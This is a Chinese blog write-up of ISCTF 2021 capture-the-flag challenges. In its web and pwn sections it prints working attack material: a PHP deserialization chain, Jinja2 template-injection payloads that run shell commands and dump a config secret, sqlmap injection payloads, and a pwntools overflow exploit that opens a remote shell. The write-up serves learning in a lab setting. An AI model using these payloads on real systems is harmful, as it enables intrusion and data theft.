31
<?php
//flag.php
//MF师傅告诉我file_get_contents这个函数能输出flag.php里面的内容

class MF_is_cat{
public $pop;
public $MF ;
function __construct(){
$this->pop =new ISCTF();
}

function __destruct(){
$this->pop->action();
}
}
class ISCTF{
function action(){
echo "Welcome to ISCTF World!";
}
}
class Show{
var $test2='la';
function action(){
echo file_get_contents('f'.$this->test2.'g.php');
}
}
$exp=new MF_is_cat();
$exp->pop=new Show();
echo serialize($exp);

?>

拼图

观察源码,js源码一堆base编码,写个脚本跑一下

1
2
3
4
5
6
7
8
9
10
11
12
13
# coding: UTF-8
import base64
list=['dW1hc2s=','YW1k','VnVlUm91dGVy','Y2xhc3NDYWxsQ2hlY2s=',.....,'Y3dk','Y2hkaXI=','cHJvY2Vzcy5jaGRpciBpcyBub3Qgc3VwcG9ydGVk']
for i in list:
m=base64.b64decode(i)
if "ISCTF" in str(m):
print(m)

b'You Win! This is your flag: ISCTF{p1e2se_G4ME_n00ds_Gre4t_M!nd!}'
'


flag:ISCTF{p1e2se_G4ME_n00ds_Gre4t_M!nd!}

easy flask

hint:尝试/wow目录,考虑因没有渲染模版文件导致恶意代码注入问题。参数为id

1
2
3
4
5
6
7
8
9
10
11
12
13
Payload:/wow/?id={{[].__class__.__base__.__subclasses__()}}
#[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'dict_reversekeyiterator'>, <class 'dict_reversevalueiterator'>, <class 'dict_reverseitemiterator'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>, <class 'float'>, <class 'frozenset'>, <class 'property'>, <class 'managedbuffer'>, <class 'memoryview'>, <class 'tuple'>, <class 'enumerate'>, <class 'reversed'>, <class 'stderrprinter'>, <class 'code'>, <class 'frame'>, <class 'builtin_function_or_method'>, <class 'method'>, <class 'function'>, <class 'mappingproxy'>, <class 'generator'>, <class 'getset_descriptor'>, <class 'wrapper_descriptor'>, <class 'method-wrapper'>, <class 'ellipsis'>, <class 'member_descriptor'>, <class 'types.SimpleNamespace'>, <class 'PyCapsule'>, <class 'longrange_iterator'>, <class 'cell'>, <class 'instancemethod'>, <class 'classmethod_descriptor'>, <class 'method_descriptor'>, <class 'callable_iterator'>, <class 'iterator'>, <class 'pickle.PickleBuffer'>, <class 'coroutine'>, <class 'coroutine_wrapper'>, <class 'InterpreterID'>, <class 'EncodingMap'>, <class 'fieldnameiterator'>, <class 'formatteriterator'>, <class 'BaseException'>, <class 'hamt'>, <class 'hamt_array_node'>, <class 'hamt_bitmap_node'>, <class 'hamt_collision_node'>, <class 'keys'>, <class 'values'>, <class 'items'>, <class 'Context'>, <class 'ContextVar'>, <class 'Token'>, <class 'Token.MISSING'>, <class 'moduledef'>, <class 'module'>, <class 'filter'>, <class 'map'>, <class 'zip'>, <class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib.BuiltinImporter'>, <class 'classmethod'>, <class '_frozen_importlib.FrozenImporter'>, <class '_frozen_importlib._ImportLockContext'>, <class '_thread._localdummy'>, <class '_thread._local'>, <class '_thread.lock'>, <class '_thread.RLock'>, <class '_frozen_importlib_external.WindowsRegistryFinder'>, <class '_frozen_importlib_external._LoaderBasics'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.PathFinder'>, <class '_frozen_importlib_external.FileFinder'>, <class '_io._IOBase'>, <class '_io._BytesIOBuffer'>, <class '_io.IncrementalNewlineDecoder'>, <class 'posix.ScandirIterator'>, <class 'posix.DirEntry'>, <class 'zipimport.zipimporter'>, <class 'zipimport._ZipImportResourceReader'>, <class 'codecs.Codec'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class '_abc_data'>, <class 'abc.ABC'>, <class 'dict_itemiterator'>, <class 'collections.abc.Hashable'>, <class 'collections.abc.Awaitable'>, <class 'collections.abc.AsyncIterable'>, <class 'async_generator'>, <class 'collections.abc.Iterable'>, <class 'bytes_iterator'>, <class 'bytearray_iterator'>, <class 'dict_keyiterator'>, <class 'dict_valueiterator'>, <class 'list_iterator'>, <class 'list_reverseiterator'>, <class 'range_iterator'>, <class 'set_iterator'>, <class 'str_iterator'>, <class 'tuple_iterator'>, <class 'collections.abc.Sized'>, <class 'collections.abc.Container'>, <class 'collections.abc.Callable'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class '_sitebuiltins._Helper'>, <class 'types.DynamicClassAttribute'>, <class 'types._GeneratorWrapper'>, <class 'enum.auto'>, <enum 'Enum'>, <class 're.Pattern'>, <class 're.Match'>, <class '_sre.SRE_Scanner'>, <class 'sre_parse.State'>, <class 'sre_parse.SubPattern'>, <class 'sre_parse.Tokenizer'>, <class 'operator.itemgetter'>, <class 'operator.attrgetter'>, <class 'operator.methodcaller'>, <class 'itertools.accumulate'>, <class 'itertools.combinations'>, <class 'itertools.combinations_with_replacement'>, <class 'itertools.cycle'>, <class 'itertools.dropwhile'>, <class 'itertools.takewhile'>, <class 'itertools.islice'>, <class 'itertools.starmap'>, <class 'itertools.chain'>, <class 'itertools.compress'>, <class 'itertools.filterfalse'>, <class 'itertools.count'>, <class 'itertools.zip_longest'>, <class 'itertools.permutations'>, <class 'itertools.product'>, <class 'itertools.repeat'>, <class 'itertools.groupby'>, <class 'itertools._grouper'>, <class 'itertools._tee'>, <class 'itertools._tee_dataobject'>, <class 'reprlib.Repr'>, <class 'collections.deque'>, <class '_collections._deque_iterator'>, <class '_collections._deque_reverse_iterator'>, <class '_collections._tuplegetter'>, <class 'collections._Link'>, <class 'functools.partial'>, <class 'functools._lru_cache_wrapper'>, <class 'functools.partialmethod'>, <class 'functools.singledispatchmethod'>, <class 'functools.cached_property'>, <class 're.Scanner'>, <class 'string.Template'>, <class 'string.Formatter'>, <class 'contextlib.ContextDecorator'>, <class 'contextlib._GeneratorContextManagerBase'>, <class 'contextlib._BaseExitStack'>, <class 'typing._Final'>, <class 'typing._Immutable'>, <class 'typing.Generic'>, <class 'typing._TypingEmpty'>, <class 'typing._TypingEllipsis'>, <class 'typing.NamedTuple'>, <class 'typing.io'>, <class 'typing.re'>, <class '_ast.AST'>, <class 'markupsafe._MarkupEscapeHelper'>, <class 'select.poll'>, <class 'select.epoll'>, <class 'selectors.BaseSelector'>, <class '_socket.socket'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class 'threading._RLock'>, <class 'threading.Condition'>, <class 'threading.Semaphore'>, <class 'threading.Event'>, <class 'threading.Barrier'>, <class 'threading.Thread'>, <class 'socketserver.BaseServer'>, <class 'socketserver.ForkingMixIn'>, <class 'socketserver.ThreadingMixIn'>, <class 'socketserver.BaseRequestHandler'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class 'datetime.date'>, <class 'datetime.timedelta'>, <class 'datetime.time'>, <class 'datetime.tzinfo'>, <class 'weakref.finalize._Info'>, <class 'weakref.finalize'>, <class '_sha512.sha384'>, <class '_sha512.sha512'>, <class '_random.Random'>, <class 'urllib.parse._ResultMixinStr'>, <class 'urllib.parse._ResultMixinBytes'>, <class 'urllib.parse._NetlocResultMixinBase'>, <class 'calendar._localized_month'>, <class 'calendar._localized_day'>, <class 'calendar.Calendar'>, <class 'calendar.different_locale'>, <class 'email._parseaddr.AddrlistClass'>, <class 'Struct'>, <class 'unpack_iterator'>, <class 'email.charset.Charset'>, <class 'email.header.Header'>, <class 'email.header._ValueFormatter'>, <class 'email._policybase._PolicyBase'>, <class 'email.feedparser.BufferedSubFile'>, <class 'email.feedparser.FeedParser'>, <class 'email.parser.Parser'>, <class 'email.parser.BytesParser'>, <class 'email.message.Message'>, <class 'http.client.HTTPConnection'>, <class '_ssl._SSLContext'>, <class '_ssl._SSLSocket'>, <class '_ssl.MemoryBIO'>, <class '_ssl.Session'>, <class 'ssl.SSLObject'>, <class 'mimetypes.MimeTypes'>, <class 'zlib.Compress'>, <class 'zlib.Decompress'>, <class '_bz2.BZ2Compressor'>, <class '_bz2.BZ2Decompressor'>, <class '_lzma.LZMACompressor'>, <class '_lzma.LZMADecompressor'>, <class 'dis.Bytecode'>, <class 'tokenize.Untokenizer'>, <class 'inspect.BlockFinder'>, <class 'inspect._void'>, <class 'inspect._empty'>, <class 'inspect.Parameter'>, <class 'inspect.BoundArguments'>, <class 'inspect.Signature'>, <class 'traceback.FrameSummary'>, <class 'traceback.TracebackException'>, <class 'logging.LogRecord'>, <class 'logging.PercentStyle'>, <class 'logging.Formatter'>, <class 'logging.BufferingFormatter'>, <class 'logging.Filter'>, <class 'logging.Filterer'>, <class 'logging.PlaceHolder'>, <class 'logging.Manager'>, <class 'logging.LoggerAdapter'>, <class 'werkzeug._internal._Missing'>, <class 'werkzeug.exceptions.Aborter'>, <class 'werkzeug.urls.Href'>, <class 'subprocess.CompletedProcess'>, <class 'subprocess.Popen'>, <class '_hashlib.HASH'>, <class '_blake2.blake2b'>, <class '_blake2.blake2s'>, <class '_sha3.sha3_224'>, <class '_sha3.sha3_256'>, <class '_sha3.sha3_384'>, <class '_sha3.sha3_512'>, <class '_sha3.shake_128'>, <class '_sha3.shake_256'>, <class 'tempfile._RandomNameSequence'>, <class 'tempfile._TemporaryFileCloser'>, <class 'tempfile._TemporaryFileWrapper'>, <class 'tempfile.SpooledTemporaryFile'>, <class 'tempfile.TemporaryDirectory'>, <class 'urllib.request.Request'>, <class 'urllib.request.OpenerDirector'>, <class 'urllib.request.BaseHandler'>, <class 'urllib.request.HTTPPasswordMgr'>, <class 'urllib.request.AbstractBasicAuthHandler'>, <class 'urllib.request.AbstractDigestAuthHandler'>, <class 'urllib.request.URLopener'>, <class 'urllib.request.ftpwrapper'>, <class 'http.cookiejar.Cookie'>, <class 'http.cookiejar.CookiePolicy'>, <class 'http.cookiejar.Absent'>, <class 'http.cookiejar.CookieJar'>, <class 'werkzeug.datastructures.ImmutableListMixin'>, <class 'werkzeug.datastructures.ImmutableDictMixin'>, <class 'werkzeug.datastructures._omd_bucket'>, <class 'werkzeug.datastructures.Headers'>, <class 'werkzeug.datastructures.ImmutableHeadersMixin'>, <class 'werkzeug.datastructures.IfRange'>, <class 'werkzeug.datastructures.Range'>, <class 'werkzeug.datastructures.ContentRange'>, <class 'werkzeug.datastructures.FileStorage'>, <class 'dataclasses._HAS_DEFAULT_FACTORY_CLASS'>, <class 'dataclasses._MISSING_TYPE'>, <class 'dataclasses._FIELD_BASE'>, <class 'dataclasses.InitVar'>, <class 'dataclasses.Field'>, <class 'dataclasses._DataclassParams'>, <class 'werkzeug.sansio.multipart.Event'>, <class 'werkzeug.sansio.multipart.MultipartDecoder'>, <class 'werkzeug.sansio.multipart.MultipartEncoder'>, <class 'importlib.abc.Finder'>, <class 'importlib.abc.Loader'>, <class 'importlib.abc.ResourceReader'>, <class 'pkgutil.ImpImporter'>, <class 'pkgutil.ImpLoader'>, <class 'hmac.HMAC'>, <class 'werkzeug.wsgi.ClosingIterator'>, <class 'werkzeug.wsgi.FileWrapper'>, <class 'werkzeug.wsgi._RangeWrapper'>, <class 'werkzeug.utils.HTMLBuilder'>, <class 'werkzeug.wrappers.accept.AcceptMixin'>, <class 'werkzeug.wrappers.auth.AuthorizationMixin'>, <class 'werkzeug.wrappers.auth.WWWAuthenticateMixin'>, <class '_json.Scanner'>, <class '_json.Encoder'>, <class 'json.decoder.JSONDecoder'>, <class 'json.encoder.JSONEncoder'>, <class 'werkzeug.formparser.FormDataParser'>, <class 'werkzeug.formparser.MultiPartParser'>, <class 'werkzeug.user_agent.UserAgent'>, <class 'werkzeug.useragents._UserAgentParser'>, <class 'werkzeug.sansio.request.Request'>, <class 'werkzeug.wrappers.request.StreamOnlyMixin'>, <class 'werkzeug.sansio.response.Response'>, <class 'werkzeug.wrappers.response.ResponseStream'>, <class 'werkzeug.wrappers.response.ResponseStreamMixin'>, <class 'werkzeug.wrappers.common_descriptors.CommonRequestDescriptorsMixin'>, <class 'werkzeug.wrappers.common_descriptors.CommonResponseDescriptorsMixin'>, <class 'werkzeug.wrappers.etag.ETagRequestMixin'>, <class 'werkzeug.wrappers.etag.ETagResponseMixin'>, <class 'werkzeug.wrappers.user_agent.UserAgentMixin'>, <class 'werkzeug.test._TestCookieHeaders'>, <class 'werkzeug.test._TestCookieResponse'>, <class 'werkzeug.test.EnvironBuilder'>, <class 'werkzeug.test.Client'>, <class 'decimal.Decimal'>, <class 'decimal.Context'>, <class 'decimal.SignalDictMixin'>, <class 'decimal.ContextManager'>, <class 'numbers.Number'>, <class 'uuid.UUID'>, <class '_pickle.Unpickler'>, <class '_pickle.Pickler'>, <class '_pickle.Pdata'>, <class '_pickle.PicklerMemoProxy'>, <class '_pickle.UnpicklerMemoProxy'>, <class 'pickle._Framer'>, <class 'pickle._Unframer'>, <class 'pickle._Pickler'>, <class 'pickle._Unpickler'>, <class 'jinja2.bccache.Bucket'>, <class 'jinja2.bccache.BytecodeCache'>, <class 'jinja2.utils.MissingType'>, <class 'jinja2.utils.LRUCache'>, <class 'jinja2.utils.Cycler'>, <class 'jinja2.utils.Joiner'>, <class 'jinja2.utils.Namespace'>, <class 'jinja2.nodes.EvalContext'>, <class 'jinja2.nodes.Node'>, <class 'jinja2.visitor.NodeVisitor'>, <class 'jinja2.idtracking.Symbols'>, <class 'jinja2.compiler.MacroRef'>, <class 'jinja2.compiler.Frame'>, <class 'jinja2.runtime.TemplateReference'>, <class 'jinja2.runtime.Context'>, <class 'jinja2.runtime.BlockReference'>, <class 'jinja2.runtime.LoopContext'>, <class 'jinja2.runtime.Macro'>, <class 'jinja2.runtime.Undefined'>, <class 'ast.NodeVisitor'>, <class 'jinja2.lexer.Failure'>, <class 'jinja2.lexer.TokenStreamIterator'>, <class 'jinja2.lexer.TokenStream'>, <class 'jinja2.lexer.Lexer'>, <class 'jinja2.parser.Parser'>, <class 'jinja2.environment.Environment'>, <class 'jinja2.environment.Template'>, <class 'jinja2.environment.TemplateModule'>, <class 'jinja2.environment.TemplateExpression'>, <class 'jinja2.environment.TemplateStream'>, <class 'jinja2.loaders.BaseLoader'>, <class 'werkzeug.local.Local'>, <class 'werkzeug.local.LocalStack'>, <class 'werkzeug.local.LocalManager'>, <class 'werkzeug.local._ProxyLookup'>, <class 'werkzeug.local.LocalProxy'>, <class 'difflib.SequenceMatcher'>, <class 'difflib.Differ'>, <class 'difflib.HtmlDiff'>, <class 'pprint._safe_key'>, <class 'pprint.PrettyPrinter'>, <class 'werkzeug.routing.RuleFactory'>, <class 'werkzeug.routing.RuleTemplate'>, <class 'werkzeug.routing.BaseConverter'>, <class 'werkzeug.routing.Map'>, <class 'werkzeug.routing.MapAdapter'>, <class 'gettext.NullTranslations'>, <class 'click._compat._FixupStream'>, <class 'click._compat._AtomicFile'>, <class 'click.utils.LazyFile'>, <class 'click.utils.KeepOpenFile'>, <class 'click.utils.PacifyFlushWrapper'>, <class 'click.types.ParamType'>, <class 'click.parser.Option'>, <class 'click.parser.Argument'>, <class 'click.parser.ParsingState'>, <class 'click.parser.OptionParser'>, <class 'click.formatting.HelpFormatter'>, <class 'click.core.Context'>, <class 'click.core.BaseCommand'>, <class 'click.core.Parameter'>, <class 'flask.signals.Namespace'>, <class 'flask.signals._FakeSignal'>, <class 'flask.cli.DispatchingApp'>, <class 'flask.cli.ScriptInfo'>, <class 'flask.config.ConfigAttribute'>, <class 'flask.ctx._AppCtxGlobals'>, <class 'flask.ctx.AppContext'>, <class 'flask.ctx.RequestContext'>, <class 'flask.scaffold.Scaffold'>, <class 'itsdangerous._json._CompactJSON'>, <class 'itsdangerous.signer.SigningAlgorithm'>, <class 'itsdangerous.signer.Signer'>, <class 'itsdangerous.serializer.Serializer'>, <class 'flask.json.tag.JSONTag'>, <class 'flask.json.tag.TaggedJSONSerializer'>, <class 'flask.sessions.SessionInterface'>, <class 'flask.blueprints.BlueprintSetupState'>, <class '__future__._Feature'>, <class 'zipfile.ZipInfo'>, <class 'zipfile.LZMACompressor'>, <class 'zipfile.LZMADecompressor'>, <class 'zipfile._SharedFile'>, <class 'zipfile._Tellable'>, <class 'zipfile.ZipFile'>, <class 'zipfile.Path'>, <class 'pyexpat.xmlparser'>, <class 'plistlib.Data'>, <class 'plistlib.UID'>, <class 'plistlib._PlistParser'>, <class 'plistlib._DumbXMLWriter'>, <class 'plistlib._BinaryPlistParser'>, <class 'plistlib._BinaryPlistWriter'>, <class 'textwrap.TextWrapper'>, <class 'pkg_resources.extern.VendorImporter'>, <class 'pkg_resources._vendor.six._LazyDescr'>, <class 'pkg_resources._vendor.six._SixMetaPathImporter'>, <class 'pkg_resources._vendor.six._LazyDescr'>, <class 'pkg_resources._vendor.six._SixMetaPathImporter'>, <class 'pkg_resources._vendor.appdirs.AppDirs'>, <class 'pkg_resources.extern.packaging._structures.Infinity'>, <class 'pkg_resources.extern.packaging._structures.NegativeInfinity'>, <class 'pkg_resources.extern.packaging.version._BaseVersion'>, <class 'pkg_resources.extern.packaging.specifiers.BaseSpecifier'>, <class 'pkg_resources._vendor.pyparsing._Constants'>, <class 'pkg_resources._vendor.pyparsing._ParseResultsWithOffset'>, <class 'pkg_resources._vendor.pyparsing.ParseResults'>, <class 'pkg_resources._vendor.pyparsing.ParserElement._UnboundedCache'>, <class 'pkg_resources._vendor.pyparsing.ParserElement._FifoCache'>, <class 'pkg_resources._vendor.pyparsing.ParserElement'>, <class 'pkg_resources._vendor.pyparsing._NullToken'>, <class 'pkg_resources._vendor.pyparsing.OnlyOnce'>, <class 'pkg_resources._vendor.pyparsing.pyparsing_common'>, <class 'pkg_resources.extern.packaging.markers.Node'>, <class 'pkg_resources.extern.packaging.markers.Marker'>, <class 'pkg_resources.extern.packaging.requirements.Requirement'>, <class 'pkg_resources.IMetadataProvider'>, <class 'pkg_resources.WorkingSet'>, <class 'pkg_resources.Environment'>, <class 'pkg_resources.ResourceManager'>, <class 'pkg_resources.NullProvider'>, <class 'pkg_resources.NoDists'>, <class 'pkg_resources.EntryPoint'>, <class 'pkg_resources.Distribution'>, <class 'config.Config'>, <class 'unicodedata.UCD'>]


Payload:/wow/?id={{''.__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['popen']('ls').read()}}
#_pycache__ app.py config.py templates venv

Payload:/wow/?id={{''.__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['popen']('cat config.py').read()}}
#from datetime import timedelta class Config(object): DEBUG = True TESTING = False SECRET_KEY = "ISCTF{weLc0me_T22_Ssti1ll}" Flag = 'ISCTF{qwdwegegerg}' class DevelopmentConfig(Config): DEBUG = True class TestingConfig(Config): TESTING = True class FlagConfig(Config): Flag='ISCTF{fake_flag}' config = { 'development': DevelopmentConfig, 'default': DevelopmentConfig, 'flag' : FlagConfig }



flag:ISCTF{weLc0me_T22_Ssti1ll}

看别人wp,发现直接/wow/?id=好像也行

easysql

sqlmap一把梭

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
┌──(kali㉿kali)-[~/桌面]
└─$ sqlmap -r post.txt -D users -T flag -C flag --dump
___
__H__
___ ___[']_____ ___ ___ {1.5.7#stable}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:40:51 /2021-10-21/

[22:40:51] [INFO] parsing HTTP request from 'post.txt'
[22:40:52] [INFO] resuming back-end DBMS 'mysql'
[22:40:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (GET)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: username=admin' AND GTID_SUBSET(CONCAT(0x71786b7871,(SELECT (ELT(8845=8845,1))),0x717a6b6b71),8845)-- kRvQ&password=123

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 2550 FROM (SELECT(SLEEP(5)))ySHy)-- rsWg&password=123

Parameter: password (GET)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: username=admin&password=123' AND GTID_SUBSET(CONCAT(0x71786b7871,(SELECT (ELT(5555=5555,1))),0x717a6b6b71),5555)-- KeQK

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin&password=123' AND (SELECT 2329 FROM (SELECT(SLEEP(5)))VyYl)-- yARH
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: username, type: Single quoted string (default)
[1] place: GET, parameter: password, type: Single quoted string
[q] Quit
> 1
[22:40:53] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 7.3.4
back-end DBMS: MySQL >= 5.6
[22:40:53] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'users'
[22:40:54] [INFO] retrieved: 'ISCTF{ThiS_Is_easy_Sql_sqlMap_yyds}'
Database: users
Table: flag
[1 entry]
+-------------------------------------+
| flag |
+-------------------------------------+
| ISCTF{ThiS_Is_easy_Sql_sqlMap_yyds} |
+-------------------------------------+



flag:ISCTF{ThiS_Is_easy_Sql_sqlMap_yyds}

PWN

杰哥的nc

nc 123.57.253.184 10010

1
2
3
4
5
6
int main(){
char cmd[100];
scanf("%s",&cmd);
system(cmd);
return 0;
}

getflag

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~/桌面]
└─$ nc 123.57.253.184 10010
/bin/sh
ls
bin
dev
flag.txt
lib
lib32
lib64
nc
cat flag.txt
ISCTF{Looks_your_nc_works_we11}

救救小肥鲨吧

出题人:deoplljj

学校:福建师范大学

题目描述: 小肥鲨因为一个系统的密码而陷入了困境,需要拿到系统的管理权限,你能帮帮它吗?

nc 123.57.253.184 10001

1
2
3
4
5
6
7
8
9
10
11
12
13
int __cdecl func(int a1)
{
int result; // eax
char s[36]; // [esp+0h] [ebp-28h] BYREF

printf("help me : ");
gets(s);
if ( a1 == -1091784722 )
result = system("/bin/sh");
else
result = puts("Oh,no");
return result;
}

exp

1
2
3
4
5
6
7
from pwn import *
#p=process(./help_my_shark)
p=remote("123.57.253.184",10001)
addr=0xBEECAFEE
payload=b"B"*0x28+b"B"*4+p32(0)+p32(addr)
p.sendline(payload)
p.interactive()

结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali㉿kali)-[~/桌面]
└─$ python3 1.py
[+] Opening connection to 123.57.253.184 on port 10001: Done
[*] Switching to interactive mode
____ ____ _____ ______ ____
/ _// __// ___//_ __// __/
_/ / _\ \ / /__ / / / _/
/___//___/ \___/ /_/ /_/
Sponsored by http://www.bluesharkinfo.com/



help me : $ ls
bin
dev
flag.txt
help_my_shark
lib
lib32
lib64
$ cat flag.txt
ISCTF{Xiao_fei_sha_send_a_like_to_YoU}

RE

简单的Re

IDA打开shift+F12

image-20211031101851517

flag

1
ISCTF{debugdebugdebug_@}

re签到

查壳工具链接:https://www.52pojie.cn/thread-437586-1-1.html
脱壳工具链接:https://github.com/upx/upx/releases

UPX

image-20211031101907920

010打开RPX全替换为UPX

image-20211031101922962

然后upx脱壳

image-20211031101938670

IDA打开查看伪代码

image-20211031101955528

代码逻辑:输入字符串s的每一位和10异或 ,然后+2 ,最后得到的字符串再和a[j]数组对比 ,

可以看到a=”E[K`Ns;5mpp:5?4jnAj@5Ay”

image-20211031102011131

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
list_a=[]
a="E[K`Ns;5mpp:5?4jnAj@5Ay"
for i in a:
list_a.append(ord(i))
print(list_a)

flag = ""

for i in range(0,len(a)):
flag += chr((list_a[i]-2)^10)
print(flag)

#ISCTF{39add2978bf5b495}

Reverse-Easy_JAR

出题人:李黑子

学校:周口职业技术学院

题目描述:一种编码和加密

1.进入文件夹,正常是打不开的,需要使用cmd命令打开:

2.jar文件,使用jd_gui打开:

image-20211031102200027

\3. 看对NBEKABsLBisvMDcyJUZWUUU=加密的代码:

image-20211031102215111

得到代码以后编写脚本:

1
2
3
4
5
6
7
8
9
import base64
m=base64.b64decode('NBEKABsLBisvMDcyJUZWUUU=')
k=b'ctf'
flag=""
for i in range(len(m)):
flag+=chr(m[i]^k[i%3])
print("ISCTF{"+flag+"}")

#ISCTF{Welcome_ISCTF2021}

Android

猜数字

apk反编译

image-20211031102229830

按照顺序拼接flag

1
ISCTF{5ec07215-716f-498a-85ad-5f39322f707b}

锁机病毒

六位密码,后缀改为zip,解压出liblock.so,IDA打开搜索main函数

image-20211031102243174

密码是173572

image-20211031102300738

ISCTF{b3d3b0eO-ccfd-4d7b-be78-0ab81da3d334}

Coding

KNN

出题人:Marcher

学校:大理大学

题目描述:一种简单的算法

包裹ISCTF{}后提交

knn,大一python的实验项目,跑机器学习的,用来分类数据,找到之前写的分类水果的脚本,改一下。

用不了,水果是三维的这题需要重写一个脚本,直接去csdn找代码:

https://blog.csdn.net/weixin_30846599/article/details/97486168

https://blog.csdn.net/cqulun123/article/details/80217558

修改一下他的测试训练集的代码。:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
def createdataset():
group = array([
[0, 0],[0, 0.5],[0, 1],
[1.0, 1.1], [1.0, 1.5],[1.0, 2.0],
[2.0,2.0],[2.0,2.5],[2.0,3.0],
[3.0,3.0],[3.0,3.5],[3.0,4.0],
[4.0,4.0],[4.0,4.5],[4.0,5.0],
[5.0,5.0],[5.0,5.5],[5.0,6.0],
[6.0,6.0],[6.0,6.5],[6.0,7.0],
[7.0,7.0],[7.0,7.5],[7.0,8.0],
[8.0,8.0],[8.0,8.5],[8.0,9.0],
[9.0,9.0],[9.0,9.5],[9.0,10.0],
[10.0,10.0],[10.0,10.5],[10.0,11.0],
[11.0,11.0],[11.0,11.5],[11.0,12.0],
[12.0,12.0],[12.0,12.5],[12.0,13.0],
[13.0,13.0],[13.0,13.5],[13.0,14.0],
[14.0,14.0],[14.0,14.5],[14.0,15.0],
[15.0,15.0],[15.0,15.5],[15.0,16.0],
[16.0,16.0],[16.0,16.5],[16.0,17.0],
[17.0,17.0],[17.0,17.5],[17.0,18.0],
[18.0,18.0],[18.0,18.5],[18.0,19.0],
[19.0,19.0],[19.0,19.5],[19.0,20.0],
[20.0,20.0],[20.0,20.5],[20.0,21.0],
[21.0,21.0],[21.0,21.5],[21.0,22.0],
[22.0,22.0]])
labels = ['A', 'a', 'B', 'b', 'C', 'c', 'D', 'd', 'E', 'e', 'F', 'f', 'G', 'g', 'H', 'h', 'I', 'i', 'J', 'j', 'K', 'k', 'L', 'l', 'M', 'm', 'N', 'n', 'O', 'o', 'P', 'p', 'Q', 'q', 'R', 'r', 'S', 's', 'T', 't', 'U', 'u', 'V', 'v', 'W', 'w', 'X', 'x', 'Y', 'y', 'Z', 'z','@','!','_','%','~','1','2','3','4','5','6','7','8','9','0']
return group, labels
def KNN_run(inx, data_set, labels, k):
data_set_size = data_set.shape[0]
diff_mat = tile(inx, (data_set_size, 1)) - data_set
sq_diff_mat = diff_mat**2
sq_distances = sq_diff_mat.sum(axis=1)
distances = sq_distances**0.5
orted_dist_indicies = distances.argsort()
class_count = {}

for i in range(k):
vote_label = labels[orted_dist_indicies[i]]
class_count[vote_label] = class_count.get(vote_label, 0) + 1
sorted_class_count = sorted(class_count.items(),
key=operator.itemgetter(1), reverse=True)
return sorted_class_count[0][0]

#data=[[20,13],[9,5],[47,73],[11,54],[36,34],[90,60],[69,26],[69,59],[8,75],[44,18],[18,90],[68,71],[37,88],[16,21],[58,9],[96,77],[35,54],[23,33],[97,77],[76,47],[67,16],[28,13],[1,93],[45,12],[66,87],[15,74],[28,39],[99,1],[82,17],[99,42],[17,46],[75,21],[42,24],[97,15],[60,27],[60,35],[70,75],[18,89],[65,74],[73,30],[47,13],[93,39],[25,63]]
#K=5
if __name__ == '__main__':
group, labels = createdataset()
data = [[20,13],[9,5],[47,73],[11,54],[36,34],[90,60],[69,26],[69,59],[8,75],[44,18],[18,90],[68,71],[37,88],[16,21],[58,9],[96,77],[35,54],[23,33],[97,77],[76,47],[67,16],[28,13],[1,93],[45,12],[66,87],[15,74],[28,39],[99,1],[82,17],[99,42],[17,46],[75,21],[42,24],[97,15],[60,27],[60,35],[70,75],[18,89],[65,74],[73,30],[47,13],[93,39],[25,63]]
for i in data:
test_class = KNN_run(i, group, labels, 5)
print(test_class,end=""

flag:ISCTF{zk09000090900~00000007900900009000000900000}

问卷题

1
ISCTF{Thank_U_4_Participating_ISCTF2021_AnD_C_U_Next_Ye@r}

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!